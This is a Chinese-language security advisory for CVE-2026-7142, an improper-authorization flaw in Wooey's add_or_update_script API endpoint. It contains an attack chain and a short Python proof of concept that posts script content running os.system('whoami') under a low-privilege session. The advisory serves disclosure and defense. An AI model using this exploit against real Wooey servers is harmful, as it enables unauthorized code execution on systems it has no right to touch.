IPBUF安全漏洞报告
English
CVE-2026-7142 CVSS 6.3 中危

CVE-2026-7142 Wooey权限不当漏洞

披露日期: 2026-04-27
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7142
漏洞类型
权限不当
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Wooey

相关标签

权限不当WooeyCVE-2026-7142API安全

漏洞概述

Wooey 0.13.2及之前版本被发现存在权限不当漏洞(CVE-2026-7142)。该漏洞影响组件API Endpoint中的 `add_or_update_script` 函数。由于系统未能正确验证用户权限,低权限攻击者可远程发起攻击,利用该漏洞执行未授权的脚本操作。建议用户尽快升级至修复版本以消除安全风险。

技术细节

该漏洞根源在于Wooey框架对API端点 `add_or_update_script` 的访问控制实现存在缺陷。在受影响版本中,该函数未对调用者的权限进行严格校验,导致任何经过低权限认证(PR:L)的用户均可触发该功能。攻击者无需诱导用户交互(UI:N),即可通过网络(AV:N)向受影响端点发送特制的HTTP POST请求。成功利用该漏洞后,攻击者能够在服务器上添加或修改脚本文件,进而可能实现远程代码执行或窃取敏感数据,对系统的机密性(C:L)、完整性(I:L)和可用性(A:L)造成影响。

攻击链分析

STEP 1
侦察
攻击者识别目标网络上运行的Wooey服务,并确认其版本低于0.13.2。
STEP 2
获取权限
攻击者注册或获取一个普通低权限用户账号(PR:L)。
STEP 3
漏洞利用
攻击者向 `/api/scripts/add_or_update_script` 端点发送特制的HTTP POST请求,尝试添加或更新恶意脚本。
STEP 4
执行攻击
由于权限校验缺失,服务器接受请求并处理脚本,可能导致恶意代码被执行或数据被篡改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL example url = "http://target-host/api/scripts/add_or_update_script" # Attacker's payload (manipulated script data) payload = { "script_name": "exploit_script", "content": "import os; os.system('whoami')" } # Low-privilege user credentials cookies = { "sessionid": "low_privilege_session_cookie" } # Send malicious request response = requests.post(url, json=payload, cookies=cookies) if response.status_code == 200: print("[+] Exploit successful! Script updated without proper authorization.") else: print("[-] Exploit failed.")

影响范围

Wooey <= 0.13.2

防御指南

临时缓解措施
如果无法立即升级,建议在网络边界限制对Wooey API端点的访问,仅允许受信任的内部IP调用,并加强对用户权限的监控与审计。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表